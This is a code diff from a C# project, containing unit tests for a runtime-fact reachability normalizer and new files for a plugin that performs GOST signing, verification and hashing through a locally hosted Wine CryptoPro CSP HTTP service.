var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-full", null, DateTimeOffset.UtcNow);
Assert.Single(feed.Records);
var facts = feed.Records[0].Facts;
Assert.NotNull(facts);
Assert.Equal("svc.handler", facts.SymbolId);
Assert.Equal("java", facts.ProcessName);
Assert.Equal(9999, facts.ProcessId);
Assert.Equal("localhost:3306", facts.SocketAddress);
Assert.Equal("k8s_pod_abc", facts.ContainerId);
Assert.Equal(42, facts.HitCount);
Assert.Equal("pkg:maven/com.example/lib@1.0.0", facts.Purl);
Assert.Equal("code-123", facts.CodeId);
Assert.Equal("build-456", facts.BuildId);
Assert.Equal("/usr/lib/jvm", facts.LoaderBase);
Assert.NotNull(facts.Metadata);
Assert.Equal("prod", facts.Metadata["env"]);
}
[Fact]
public void NormalizeToFeed_SetsConfidenceBasedOnEvidence()
{
var evtWithFullEvidence = new RuntimeFactEvent
{
SymbolId = "svc.full",
ProcessName = "node",
ProcessId = 1234,
SymbolDigest = "sha256:abcdef1234567890abcdef1234567890abcdef1234567890abcdef1234567890",
EvidenceUri = "s3://bucket/evidence.json",
HitCount = 1
};
var evtMinimal = new RuntimeFactEvent
{
SymbolId = "svc.minimal",
HitCount = 1
};
var subject = new ReachabilitySubject { Component = "app", Version = "1.0.0" };
var feed = _normalizer.NormalizeToFeed(new[] { evtWithFullEvidence, evtMinimal }, subject, "cg-conf", null, DateTimeOffset.UtcNow);
Assert.Equal(2, feed.Records.Count);
var fullRecord = feed.Records.First(r => r.Facts?.SymbolId == "svc.full");
var minimalRecord = feed.Records.First(r => r.Facts?.SymbolId == "svc.minimal");
Assert.True(fullRecord.Confidence > minimalRecord.Confidence);
Assert.True(fullRecord.Confidence >= 0.95);
Assert.True(minimalRecord.Confidence >= 0.95);
}
[Fact]
public void NormalizeToFeed_BuildsEvidenceWithCaptureMethod()
{
var evt = new RuntimeFactEvent
{
SymbolId = "svc.traced",
SymbolDigest = "abc123",
EvidenceUri = "s3://evidence/trace.json",
ProcessId = 5678,
HitCount = 1,
Metadata = new Dictionary<string, string?> { ["captureMethod"] = "eBPF" }
};
var subject = new ReachabilitySubject { Component = "traced", Version = "1.0.0" };
var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-evidence", null, DateTimeOffset.UtcNow);
Assert.Single(feed.Records);
var evidence = feed.Records[0].Evidence;
Assert.NotNull(evidence);
Assert.Equal(EvidenceCaptureMethod.EBpf, evidence.CaptureMethod);
Assert.Equal("s3://evidence/trace.json", evidence.RawDataRef);
}
[Fact]
public void NormalizeToFeed_NormalizesDigestWithSha256Prefix()
{
var evt = new RuntimeFactEvent
{
SymbolId = "svc.digested",
SymbolDigest = "abcdef1234567890abcdef1234567890abcdef1234567890abcdef1234567890",
HitCount = 1
};
var subject = new ReachabilitySubject { Component = "app", Version = "1.0.0" };
var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-digest", null, DateTimeOffset.UtcNow);
Assert.Single(feed.Records);
var evidence = feed.Records[0].Evidence;
Assert.NotNull(evidence);
Assert.StartsWith("sha256:", evidence.SourceDigest);
}
[Fact]
public void NormalizeToFeed_SkipsEventsWithEmptySymbolId()
{
var events = new List<RuntimeFactEvent>
{
new() { SymbolId = "valid.symbol", HitCount = 1 },
new() { SymbolId = "", HitCount = 1 },
new() { SymbolId = " ", HitCount = 1 },
new() { SymbolId = null!, HitCount = 1 }
};
var subject = new ReachabilitySubject { Component = "app", Version = "1.0.0" };
var feed = _normalizer.NormalizeToFeed(events, subject, "cg-filter", null, DateTimeOffset.UtcNow);
Assert.Single(feed.Records);
Assert.Equal("valid.symbol", feed.Records[0].Facts?.SymbolId);
}
[Fact]
public void CreateContextFacts_ReturnsPopulatedContextFacts()
{
var events = new List<RuntimeFactEvent>
{
new() { SymbolId = "svc.a", HitCount = 1 },
new() { SymbolId = "svc.b", HitCount = 2 },
new() { SymbolId = "svc.c", HitCount = 3 }
};
var subject = new ReachabilitySubject { Component = "svc", Version = "1.0.0" };
var timestamp = DateTimeOffset.Parse("2025-12-07T12:00:00Z");
var contextFacts = _normalizer.CreateContextFacts(events, subject, "cg-ctx", null, timestamp);
Assert.NotNull(contextFacts);
Assert.NotNull(contextFacts.Provenance);
Assert.Equal(timestamp, contextFacts.LastUpdatedAt);
Assert.Equal(3, contextFacts.RecordCount);
Assert.Equal(3, contextFacts.Provenance.Records.Count);
}
[Fact]
public void NormalizeToFeed_DeterminesObserverFromContainerContext()
{
var evt = new RuntimeFactEvent
{
SymbolId = "container.runtime",
ContainerId = "docker_abc123",
HitCount = 1
};
var subject = new ReachabilitySubject { ImageDigest = "sha256:test" };
var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-observer", null, DateTimeOffset.UtcNow);
Assert.Single(feed.Records);
Assert.Equal("container-runtime-agent", feed.Records[0].ObservedBy);
}
[Fact]
public void NormalizeToFeed_DeterminesObserverFromProcessContext()
{
var evt = new RuntimeFactEvent
{
SymbolId = "process.runtime",
ProcessId = 12345,
HitCount = 1
};
var subject = new ReachabilitySubject { Component = "app", Version = "1.0.0" };
var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-proc", null, DateTimeOffset.UtcNow);
Assert.Single(feed.Records);
Assert.Equal("process-monitor-agent", feed.Records[0].ObservedBy);
}
[Fact]
public void NormalizeToFeed_UsesObservedAtFromEvent()
{
var observedTime = DateTimeOffset.Parse("2025-12-06T08:00:00Z");
var generatedTime = DateTimeOffset.Parse("2025-12-07T10:00:00Z");
var evt = new RuntimeFactEvent
{
SymbolId = "svc.timed",
ObservedAt = observedTime,
HitCount = 1
};
var subject = new ReachabilitySubject { Component = "timed", Version = "1.0.0" };
var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-time", null, generatedTime);
Assert.Single(feed.Records);
Assert.Equal(observedTime, feed.Records[0].OccurredAt);
}
[Fact]
public void NormalizeToFeed_FallsBackToGeneratedAtWhenNoObservedAt()
{
var generatedTime = DateTimeOffset.Parse("2025-12-07T10:00:00Z");
var evt = new RuntimeFactEvent
{
SymbolId = "svc.notime",
HitCount = 1
};
var subject = new ReachabilitySubject { Component = "notime", Version = "1.0.0" };
var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-notime", null, generatedTime);
Assert.Single(feed.Records);
Assert.Equal(generatedTime, feed.Records[0].OccurredAt);
}
[Fact]
public void NormalizeToFeed_BuildsSubjectIdentifierFromPurl()
{
var evt = new RuntimeFactEvent
{
SymbolId = "lib.call",
Purl = "pkg:npm/express@4.18.0",
HitCount = 1
};
var subject = new ReachabilitySubject { Component = "webapp", Version = "1.0.0" };
var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-purl", null, DateTimeOffset.UtcNow);
Assert.Single(feed.Records);
Assert.Equal("pkg:npm/express@4.18.0", feed.Records[0].Subject.Identifier);
}
[Fact]
public void NormalizeToFeed_BuildsSubjectIdentifierFromComponent()
{
var evt = new RuntimeFactEvent
{
SymbolId = "svc.call",
HitCount = 1
};
var subject = new ReachabilitySubject { Component = "my-service", Version = "2.0.0" };
var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-comp", null, DateTimeOffset.UtcNow);
Assert.Single(feed.Records);
Assert.Equal("my-service@2.0.0", feed.Records[0].Subject.Identifier);
}
[Fact]
public void NormalizeToFeed_UsesImageDigestAsSubjectForContainers()
{
var evt = new RuntimeFactEvent
{
SymbolId = "container.exec",
HitCount = 1
};
var subject = new ReachabilitySubject
{
ImageDigest = "sha256:abc123def456"
};
var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-image", null, DateTimeOffset.UtcNow);
Assert.Single(feed.Records);
Assert.Equal(ProvenanceSubjectType.Image, feed.Records[0].Subject.Type);
Assert.Equal("sha256:abc123def456", feed.Records[0].Subject.Identifier);
}
}

View File

@@ -0,0 +1,26 @@
<Project Sdk="Microsoft.NET.Sdk">
<PropertyGroup>
<TargetFramework>net10.0</TargetFramework>
<Nullable>enable</Nullable>
<ImplicitUsings>enable</ImplicitUsings>
<!-- Wine CSP HTTP Provider - remote GOST operations via Wine CSP service -->
<AssemblyName>StellaOps.Cryptography.Plugin.WineCsp</AssemblyName>
<RootNamespace>StellaOps.Cryptography.Plugin.WineCsp</RootNamespace>
</PropertyGroup>
<ItemGroup>
<ProjectReference Include="..\StellaOps.Cryptography\StellaOps.Cryptography.csproj" />
</ItemGroup>
<ItemGroup>
<PackageReference Include="Microsoft.Extensions.Http" Version="9.0.0" />
<PackageReference Include="Microsoft.Extensions.Http.Polly" Version="9.0.0" />
<PackageReference Include="Microsoft.Extensions.Logging.Abstractions" Version="9.0.0" />
<PackageReference Include="Microsoft.Extensions.Options" Version="9.0.0" />
<PackageReference Include="System.Text.Json" Version="9.0.0" />
<PackageReference Include="Microsoft.IdentityModel.Tokens" Version="8.0.0" />
</ItemGroup>
</Project>

View File

@@ -0,0 +1,90 @@
using Microsoft.Extensions.DependencyInjection;
using Microsoft.Extensions.DependencyInjection.Extensions;
using Microsoft.Extensions.Options;
using Polly;
using Polly.Extensions.Http;
namespace StellaOps.Cryptography.Plugin.WineCsp;
/// <summary>
/// Extension methods for registering the Wine CSP HTTP provider.
/// </summary>
public static class WineCspCryptoServiceCollectionExtensions
{
/// <summary>
/// Registers the Wine CSP HTTP provider for GOST operations via Wine-hosted CryptoPro CSP.
/// </summary>
/// <param name="services">Service collection.</param>
/// <param name="configureOptions">Optional options configuration.</param>
/// <returns>Service collection for chaining.</returns>
public static IServiceCollection AddWineCspProvider(
this IServiceCollection services,
Action<WineCspProviderOptions>? configureOptions = null)
{
// Configure options
if (configureOptions != null)
{
services.Configure(configureOptions);
}
// Register HTTP client with retry policy
services.AddHttpClient<WineCspHttpClient>((sp, client) =>
{
var options = sp.GetService<IOptions<WineCspProviderOptions>>()?.Value
?? new WineCspProviderOptions();
client.BaseAddress = new Uri(options.ServiceUrl);
client.Timeout = TimeSpan.FromSeconds(options.TimeoutSeconds);
client.DefaultRequestHeaders.Add("Accept", "application/json");
})
.ConfigurePrimaryHttpMessageHandler(() => new SocketsHttpHandler
{
PooledConnectionLifetime = TimeSpan.FromMinutes(5),
MaxConnectionsPerServer = 10
})
.AddPolicyHandler((sp, _) =>
{
var options = sp.GetService<IOptions<WineCspProviderOptions>>()?.Value
?? new WineCspProviderOptions();
return HttpPolicyExtensions
.HandleTransientHttpError()
.WaitAndRetryAsync(
options.MaxRetries,
retryAttempt => TimeSpan.FromSeconds(Math.Pow(2, retryAttempt - 1)));
});
// Register provider
services.TryAddSingleton<WineCspHttpProvider>();
services.AddSingleton<ICryptoProvider>(sp => sp.GetRequiredService<WineCspHttpProvider>());
return services;
}
/// <summary>
/// Registers the Wine CSP HTTP provider with custom HTTP client configuration.
/// </summary>
/// <param name="services">Service collection.</param>
/// <param name="configureOptions">Options configuration.</param>
/// <param name="configureClient">HTTP client configuration.</param>
/// <returns>Service collection for chaining.</returns>
public static IServiceCollection AddWineCspProvider(
this IServiceCollection services,
Action<WineCspProviderOptions> configureOptions,
Action<HttpClient> configureClient)
{
services.Configure(configureOptions);
services.AddHttpClient<WineCspHttpClient>(configureClient)
.ConfigurePrimaryHttpMessageHandler(() => new SocketsHttpHandler
{
PooledConnectionLifetime = TimeSpan.FromMinutes(5),
MaxConnectionsPerServer = 10
});
services.TryAddSingleton<WineCspHttpProvider>();
services.AddSingleton<ICryptoProvider>(sp => sp.GetRequiredService<WineCspHttpProvider>());
return services;
}
}

View File

@@ -0,0 +1,236 @@
using System.Net.Http.Json;
using System.Text.Json;
using System.Text.Json.Serialization;
using Microsoft.Extensions.Logging;
using Microsoft.Extensions.Options;
namespace StellaOps.Cryptography.Plugin.WineCsp;
/// <summary>
/// HTTP client for communicating with the Wine CSP service.
/// </summary>
public sealed class WineCspHttpClient : IDisposable
{
private readonly HttpClient httpClient;
private readonly ILogger<WineCspHttpClient>? logger;
private readonly JsonSerializerOptions jsonOptions;
public WineCspHttpClient(
HttpClient httpClient,
IOptions<WineCspProviderOptions>? optionsAccessor = null,
ILogger<WineCspHttpClient>? logger = null)
{
this.httpClient = httpClient ?? throw new ArgumentNullException(nameof(httpClient));
this.logger = logger;
this.jsonOptions = new JsonSerializerOptions
{
PropertyNamingPolicy = JsonNamingPolicy.CamelCase,
DefaultIgnoreCondition = JsonIgnoreCondition.WhenWritingNull
};
var options = optionsAccessor?.Value ?? new WineCspProviderOptions();
if (httpClient.BaseAddress == null)
{
httpClient.BaseAddress = new Uri(options.ServiceUrl);
}
}
/// <summary>
/// Gets the CSP status from the Wine service.
/// </summary>
public async Task<WineCspStatus> GetStatusAsync(CancellationToken ct = default)
{
logger?.LogDebug("Checking Wine CSP service status");
var response = await httpClient.GetAsync("/status", ct);
response.EnsureSuccessStatusCode();
var status = await response.Content.ReadFromJsonAsync<WineCspStatus>(jsonOptions, ct);
return status ?? throw new InvalidOperationException("Invalid status response from Wine CSP service");
}
/// <summary>
/// Lists available keys from the Wine CSP service.
/// </summary>
public async Task<IReadOnlyList<WineCspKeyInfo>> ListKeysAsync(CancellationToken ct = default)
{
logger?.LogDebug("Listing keys from Wine CSP service");
var response = await httpClient.GetAsync("/keys", ct);
response.EnsureSuccessStatusCode();
var result = await response.Content.ReadFromJsonAsync<WineCspKeysResponse>(jsonOptions, ct);
return result?.Keys ?? Array.Empty<WineCspKeyInfo>();
}
/// <summary>
/// Signs data using the Wine CSP service.
/// </summary>
public async Task<WineCspSignResponse> SignAsync(
byte[] data,
string algorithm,
string? keyId,
CancellationToken ct = default)
{
logger?.LogDebug("Signing {ByteCount} bytes with algorithm {Algorithm}, keyId: {KeyId}",
data.Length, algorithm, keyId ?? "(default)");
var request = new WineCspSignRequest
{
DataBase64 = Convert.ToBase64String(data),
Algorithm = algorithm,
KeyId = keyId
};
var response = await httpClient.PostAsJsonAsync("/sign", request, jsonOptions, ct);
response.EnsureSuccessStatusCode();
var result = await response.Content.ReadFromJsonAsync<WineCspSignResponse>(jsonOptions, ct);
return result ?? throw new InvalidOperationException("Invalid sign response from Wine CSP service");
}
/// <summary>
/// Verifies a signature using the Wine CSP service.
/// </summary>
public async Task<bool> VerifyAsync(
byte[] data,
byte[] signature,
string algorithm,
string? keyId,
CancellationToken ct = default)
{
logger?.LogDebug("Verifying signature with algorithm {Algorithm}, keyId: {KeyId}",
algorithm, keyId ?? "(default)");
var request = new WineCspVerifyRequest
{
DataBase64 = Convert.ToBase64String(data),
SignatureBase64 = Convert.ToBase64String(signature),
Algorithm = algorithm,
KeyId = keyId
};
var response = await httpClient.PostAsJsonAsync("/verify", request, jsonOptions, ct);
response.EnsureSuccessStatusCode();
var result = await response.Content.ReadFromJsonAsync<WineCspVerifyResponse>(jsonOptions, ct);
return result?.IsValid ?? false;
}
/// <summary>
/// Computes a GOST hash using the Wine CSP service.
/// </summary>
public async Task<byte[]> HashAsync(
byte[] data,
string algorithm,
CancellationToken ct = default)
{
logger?.LogDebug("Hashing {ByteCount} bytes with algorithm {Algorithm}", data.Length, algorithm);
var request = new WineCspHashRequest
{
DataBase64 = Convert.ToBase64String(data),
Algorithm = algorithm
};
var response = await httpClient.PostAsJsonAsync("/hash", request, jsonOptions, ct);
response.EnsureSuccessStatusCode();
var result = await response.Content.ReadFromJsonAsync<WineCspHashResponse>(jsonOptions, ct);
if (result == null || string.IsNullOrEmpty(result.HashBase64))
{
throw new InvalidOperationException("Invalid hash response from Wine CSP service");
}
return Convert.FromBase64String(result.HashBase64);
}
/// <summary>
/// Checks if the Wine CSP service is healthy.
/// </summary>
public async Task<bool> IsHealthyAsync(CancellationToken ct = default)
{
try
{
var response = await httpClient.GetAsync("/health", ct);
return response.IsSuccessStatusCode;
}
catch
{
return false;
}
}
public void Dispose()
{
// HttpClient is managed by HttpClientFactory, don't dispose
}
}
// Request/Response DTOs matching Wine CSP Service
#region DTOs
public sealed record WineCspSignRequest
{
public required string DataBase64 { get; init; }
public string? Algorithm { get; init; }
public string? KeyId { get; init; }
}
public sealed record WineCspSignResponse
{
public required string SignatureBase64 { get; init; }
public required string Algorithm { get; init; }
public string? KeyId { get; init; }
public DateTimeOffset Timestamp { get; init; }
public string? ProviderName { get; init; }
}
public sealed record WineCspVerifyRequest
{
public required string DataBase64 { get; init; }
public required string SignatureBase64 { get; init; }
public string? Algorithm { get; init; }
public string? KeyId { get; init; }
}
public sealed record WineCspVerifyResponse
{
public bool IsValid { get; init; }
}
public sealed record WineCspHashRequest
{
public required string DataBase64 { get; init; }
public string? Algorithm { get; init; }
}
public sealed record WineCspHashResponse
{
public required string HashBase64 { get; init; }
public required string HashHex { get; init; }
}
public sealed record WineCspStatus
{
public bool IsAvailable { get; init; }
public string? ProviderName { get; init; }
public string? ProviderVersion { get; init; }
public IReadOnlyList<string> SupportedAlgorithms { get; init; } = Array.Empty<string>();
public string? Error { get; init; }
}
public sealed record WineCspKeysResponse
{
public IReadOnlyList<WineCspKeyInfo> Keys { get; init; } = Array.Empty<WineCspKeyInfo>();
}
public sealed record WineCspKeyInfo
{
public required string KeyId { get; init; }
public required string Algorithm { get; init; }
public string? ContainerName { get; init; }
public bool IsAvailable { get; init; }
}
#endregion

View File

@@ -0,0 +1,271 @@
using System.Collections.Concurrent;
using System.Security.Cryptography;
using Microsoft.Extensions.Logging;
using Microsoft.Extensions.Options;
namespace StellaOps.Cryptography.Plugin.WineCsp;
/// <summary>
/// ICryptoProvider implementation that delegates to the Wine CSP HTTP service.
/// Enables GOST cryptographic operations on Linux via Wine-hosted CryptoPro CSP.
/// </summary>
public sealed class WineCspHttpProvider : ICryptoProvider, ICryptoProviderDiagnostics, IDisposable
{
private readonly WineCspHttpClient client;
private readonly ILogger<WineCspHttpProvider>? logger;
private readonly ILoggerFactory? loggerFactory;
private readonly ConcurrentDictionary<string, WineCspKeyEntry> entries;
private readonly WineCspStatus? cachedStatus;
public WineCspHttpProvider(
WineCspHttpClient client,
IOptions<WineCspProviderOptions>? optionsAccessor = null,
ILogger<WineCspHttpProvider>? logger = null,
ILoggerFactory? loggerFactory = null)
{
this.client = client ?? throw new ArgumentNullException(nameof(client));
this.logger = logger;
this.loggerFactory = loggerFactory;
this.entries = new ConcurrentDictionary<string, WineCspKeyEntry>(StringComparer.OrdinalIgnoreCase);
var options = optionsAccessor?.Value ?? new WineCspProviderOptions();
// Load configured keys
foreach (var key in options.Keys)
{
var entry = new WineCspKeyEntry(
key.KeyId,
key.Algorithm,
key.RemoteKeyId ?? key.KeyId,
key.Description);
entries[key.KeyId] = entry;
}
// Try to probe service status
try
{
cachedStatus = client.GetStatusAsync().GetAwaiter().GetResult();
logger?.LogInformation(
"Wine CSP service available: {Available}, provider: {Provider}, algorithms: {Algorithms}",
cachedStatus.IsAvailable,
cachedStatus.ProviderName,
string.Join(", ", cachedStatus.SupportedAlgorithms));
}
catch (Exception ex)
{
logger?.LogWarning(ex, "Wine CSP service probe failed, provider will be unavailable");
cachedStatus = new WineCspStatus
{
IsAvailable = false,
Error = $"Service probe failed: {ex.Message}"
};
}
}
public string Name => "ru.winecsp.http";
public bool Supports(CryptoCapability capability, string algorithmId)
{
if (cachedStatus?.IsAvailable != true)
{
return false;
}
return capability switch
{
CryptoCapability.Signing or CryptoCapability.Verification =>
IsGostSigningAlgorithm(algorithmId),
CryptoCapability.ContentHashing =>
IsGostHashAlgorithm(algorithmId),
_ => false
};
}
public IPasswordHasher GetPasswordHasher(string algorithmId)
=> throw new NotSupportedException("Wine CSP provider does not expose password hashing.");
public ICryptoHasher GetHasher(string algorithmId)
{
if (!IsGostHashAlgorithm(algorithmId))
{
throw new NotSupportedException($"Algorithm '{algorithmId}' is not a supported GOST hash algorithm.");
}
return new WineCspHttpHasher(client, algorithmId, loggerFactory?.CreateLogger<WineCspHttpHasher>());
}
public ICryptoSigner GetSigner(string algorithmId, CryptoKeyReference keyReference)
{
ArgumentNullException.ThrowIfNull(keyReference);
if (!entries.TryGetValue(keyReference.KeyId, out var entry))
{
// Create ad-hoc entry for unregistered keys
entry = new WineCspKeyEntry(
keyReference.KeyId,
algorithmId,
keyReference.KeyId,
null);
}
else if (!string.Equals(entry.AlgorithmId, algorithmId, StringComparison.OrdinalIgnoreCase))
{
throw new InvalidOperationException(
$"Signing key '{keyReference.KeyId}' is registered for algorithm '{entry.AlgorithmId}', not '{algorithmId}'.");
}
logger?.LogDebug("Creating Wine CSP signer for key {KeyId} ({Algorithm})", entry.KeyId, entry.AlgorithmId);
return new WineCspHttpSigner(client, entry, loggerFactory?.CreateLogger<WineCspHttpSigner>());
}
public void UpsertSigningKey(CryptoSigningKey signingKey)
{
ArgumentNullException.ThrowIfNull(signingKey);
var entry = new WineCspKeyEntry(
signingKey.KeyId,
signingKey.Algorithm,
signingKey.KeyId,
null);
entries[signingKey.KeyId] = entry;
logger?.LogDebug("Registered Wine CSP key reference: {KeyId}", signingKey.KeyId);
}
public bool RemoveSigningKey(string keyId)
{
var removed = entries.TryRemove(keyId, out _);
if (removed)
{
logger?.LogDebug("Removed Wine CSP key reference: {KeyId}", keyId);
}
return removed;
}
public IReadOnlyCollection<CryptoSigningKey> GetSigningKeys()
{
// Wine CSP keys don't contain exportable key material
return Array.Empty<CryptoSigningKey>();
}
public IEnumerable<CryptoProviderKeyDescriptor> DescribeKeys()
{
foreach (var entry in entries.Values)
{
yield return new CryptoProviderKeyDescriptor(
Name,
entry.KeyId,
entry.AlgorithmId,
new Dictionary<string, string?>(StringComparer.OrdinalIgnoreCase)
{
["remoteKeyId"] = entry.RemoteKeyId,
["description"] = entry.Description,
["serviceStatus"] = cachedStatus?.IsAvailable == true ? "available" : "unavailable"
});
}
}
/// <summary>
/// Gets the cached status of the Wine CSP service.
/// </summary>
public WineCspStatus? ServiceStatus => cachedStatus;
/// <summary>
/// Checks if the Wine CSP service is currently healthy.
/// </summary>
public async Task<bool> IsServiceHealthyAsync(CancellationToken ct = default)
{
return await client.IsHealthyAsync(ct);
}
/// <summary>
/// Refreshes the list of available keys from the Wine CSP service.
/// </summary>
public async Task<IReadOnlyList<WineCspKeyInfo>> RefreshKeysAsync(CancellationToken ct = default)
{
var keys = await client.ListKeysAsync(ct);
// Optionally register discovered keys
foreach (var key in keys.Where(k => k.IsAvailable))
{
if (!entries.ContainsKey(key.KeyId))
{
var entry = new WineCspKeyEntry(
key.KeyId,
key.Algorithm,
key.KeyId,
key.ContainerName);
entries[key.KeyId] = entry;
logger?.LogInformation("Discovered Wine CSP key: {KeyId} ({Algorithm})", key.KeyId, key.Algorithm);
}
}
return keys;
}
public void Dispose()
{
client.Dispose();
}
private static bool IsGostSigningAlgorithm(string algorithmId)
{
var normalized = algorithmId.ToUpperInvariant();
return normalized.Contains("GOST") &&
(normalized.Contains("3410") || normalized.Contains("34.10"));
}
private static bool IsGostHashAlgorithm(string algorithmId)
{
var normalized = algorithmId.ToUpperInvariant();
return normalized.Contains("GOST") &&
(normalized.Contains("3411") || normalized.Contains("34.11"));
}
}
/// <summary>
/// ICryptoHasher implementation that delegates to the Wine CSP HTTP service.
/// </summary>
internal sealed class WineCspHttpHasher : ICryptoHasher
{
private readonly WineCspHttpClient client;
private readonly ILogger<WineCspHttpHasher>? logger;
public WineCspHttpHasher(WineCspHttpClient client, string algorithmId, ILogger<WineCspHttpHasher>? logger = null)
{
this.client = client ?? throw new ArgumentNullException(nameof(client));
this.AlgorithmId = algorithmId;
this.logger = logger;
}
public string AlgorithmId { get; }
public byte[] ComputeHash(ReadOnlySpan<byte> data)
{
logger?.LogDebug("Computing GOST hash via Wine CSP service, {ByteCount} bytes", data.Length);
var result = client.HashAsync(
data.ToArray(),
MapAlgorithmToWineCsp(AlgorithmId),
CancellationToken.None).GetAwaiter().GetResult();
return result;
}
public string ComputeHashHex(ReadOnlySpan<byte> data)
{
var hash = ComputeHash(data);
return Convert.ToHexString(hash).ToLowerInvariant();
}
private static string MapAlgorithmToWineCsp(string algorithmId)
{
return algorithmId.ToUpperInvariant() switch
{
"GOST-R-34.11-2012-256" or "GOSTR3411-2012-256" => "GOST12-256",
"GOST-R-34.11-2012-512" or "GOSTR3411-2012-512" => "GOST12-512",
_ => algorithmId
};
}
}

View File

@@ -0,0 +1,122 @@
using System.Security.Cryptography;
using Microsoft.Extensions.Logging;
using Microsoft.IdentityModel.Tokens;
namespace StellaOps.Cryptography.Plugin.WineCsp;
/// <summary>
/// ICryptoSigner implementation that delegates to the Wine CSP HTTP service.
/// </summary>
internal sealed class WineCspHttpSigner : ICryptoSigner
{
private readonly WineCspHttpClient client;
private readonly WineCspKeyEntry entry;
private readonly ILogger<WineCspHttpSigner>? logger;
public WineCspHttpSigner(
WineCspHttpClient client,
WineCspKeyEntry entry,
ILogger<WineCspHttpSigner>? logger = null)
{
this.client = client ?? throw new ArgumentNullException(nameof(client));
this.entry = entry ?? throw new ArgumentNullException(nameof(entry));
this.logger = logger;
}
public string KeyId => entry.KeyId;
public string AlgorithmId => entry.AlgorithmId;
public async ValueTask<byte[]> SignAsync(ReadOnlyMemory<byte> data, CancellationToken cancellationToken = default)
{
cancellationToken.ThrowIfCancellationRequested();
try
{
logger?.LogDebug("Signing {ByteCount} bytes via Wine CSP service, key: {KeyId}",
data.Length, entry.KeyId);
var response = await client.SignAsync(
data.ToArray(),
MapAlgorithmToWineCsp(entry.AlgorithmId),
entry.RemoteKeyId,
cancellationToken);
var signature = Convert.FromBase64String(response.SignatureBase64);
logger?.LogDebug("Signature received: {SignatureBytes} bytes from provider {Provider}",
signature.Length, response.ProviderName);
return signature;
}
catch (HttpRequestException ex)
{
logger?.LogError(ex, "Wine CSP service communication failed during signing");
throw new CryptographicException("Wine CSP service unavailable for signing", ex);
}
}
public async ValueTask<bool> VerifyAsync(ReadOnlyMemory<byte> data, ReadOnlyMemory<byte> signature, CancellationToken cancellationToken = default)
{
cancellationToken.ThrowIfCancellationRequested();
try
{
logger?.LogDebug("Verifying signature via Wine CSP service, key: {KeyId}", entry.KeyId);
return await client.VerifyAsync(
data.ToArray(),
signature.ToArray(),
MapAlgorithmToWineCsp(entry.AlgorithmId),
entry.RemoteKeyId,
cancellationToken);
}
catch (HttpRequestException ex)
{
logger?.LogError(ex, "Wine CSP service communication failed during verification");
throw new CryptographicException("Wine CSP service unavailable for verification", ex);
}
}
public JsonWebKey ExportPublicJsonWebKey()
{
// Generate a JWK stub for the GOST key
// Full public key export would require additional certificate data from the service
var jwk = new JsonWebKey
{
Kid = KeyId,
Alg = AlgorithmId,
Kty = "EC",
Crv = entry.AlgorithmId.Contains("512", StringComparison.OrdinalIgnoreCase)
? "GOST3410-2012-512"
: "GOST3410-2012-256",
Use = JsonWebKeyUseNames.Sig
};
jwk.KeyOps.Add("sign");
jwk.KeyOps.Add("verify");
return jwk;
}
private static string MapAlgorithmToWineCsp(string algorithmId)
{
return algorithmId.ToUpperInvariant() switch
{
"GOST-R-34.10-2012-256" or "GOSTR3410-2012-256" => "GOST12-256",
"GOST-R-34.10-2012-512" or "GOSTR3410-2012-512" => "GOST12-512",
"GOST-R-34.11-2012-256" => "GOST12-256",
"GOST-R-34.11-2012-512" => "GOST12-512",
_ => algorithmId // Pass through if already in Wine CSP format
};
}
}
/// <summary>
/// Internal representation of a key accessible via Wine CSP service.
/// </summary>
internal sealed record WineCspKeyEntry(
string KeyId,
string AlgorithmId,
string? RemoteKeyId,
string? Description);

View File

@@ -0,0 +1,65 @@
using System.Collections.Generic;
using System.ComponentModel.DataAnnotations;
namespace StellaOps.Cryptography.Plugin.WineCsp;
/// <summary>
/// Configuration options for the Wine CSP HTTP provider.
/// </summary>
public sealed class WineCspProviderOptions
{
/// <summary>
/// Base URL for the Wine CSP service (default: http://localhost:5099).
/// </summary>
[Required]
public string ServiceUrl { get; set; } = "http://localhost:5099";
/// <summary>
/// HTTP request timeout in seconds (default: 30).
/// </summary>
public int TimeoutSeconds { get; set; } = 30;
/// <summary>
/// Whether to enable HTTP connection pooling (default: true).
/// </summary>
public bool EnableConnectionPooling { get; set; } = true;
/// <summary>
/// Maximum number of retries for transient failures (default: 2).
/// </summary>
public int MaxRetries { get; set; } = 2;
/// <summary>
/// Pre-configured key references for signing.
/// </summary>
public List<WineCspKeyOptions> Keys { get; set; } = new();
}
/// <summary>
/// Configuration for a key accessible via the Wine CSP service.
/// </summary>
public sealed class WineCspKeyOptions
{
/// <summary>
/// Unique identifier for the key (used as reference in ICryptoSigner).
/// </summary>
[Required]
public required string KeyId { get; set; }
/// <summary>
/// Algorithm identifier (e.g., GOST-R-34.10-2012-256).
/// </summary>
[Required]
public required string Algorithm { get; set; }
/// <summary>
/// Remote key ID on the Wine CSP service (certificate thumbprint or container name).
/// If null, uses KeyId.
/// </summary>
public string? RemoteKeyId { get; set; }
/// <summary>
/// Description of the key for diagnostics.
/// </summary>
public string? Description { get; set; }
}

View File

@@ -0,0 +1,423 @@
// CryptoPro GOST Signing Service - interfaces with CryptoPro CSP via GostCryptography
// This service requires CryptoPro CSP to be installed in the Wine environment
using System.Security.Cryptography;
using System.Security.Cryptography.X509Certificates;
using GostCryptography.Cryptography;
namespace StellaOps.Tools.WineCspService;
/// <summary>
/// GOST signing service interface.
/// </summary>
public interface IGostSigningService
{
CspStatus GetStatus();
IReadOnlyList<KeyInfo> ListKeys();
Task<SignResponse> SignAsync(byte[] data, string algorithm, string? keyId, CancellationToken ct);
Task<bool> VerifyAsync(byte[] data, byte[] signature, string algorithm, string? keyId, CancellationToken ct);
byte[] Hash(byte[] data, string algorithm);
Task<TestVectorSet> GenerateTestVectorsAsync(string algorithm, string? keyId, CancellationToken ct);
}
/// <summary>
/// CryptoPro CSP-based GOST signing implementation.
/// </summary>
public sealed class CryptoProGostSigningService : IGostSigningService, IDisposable
{
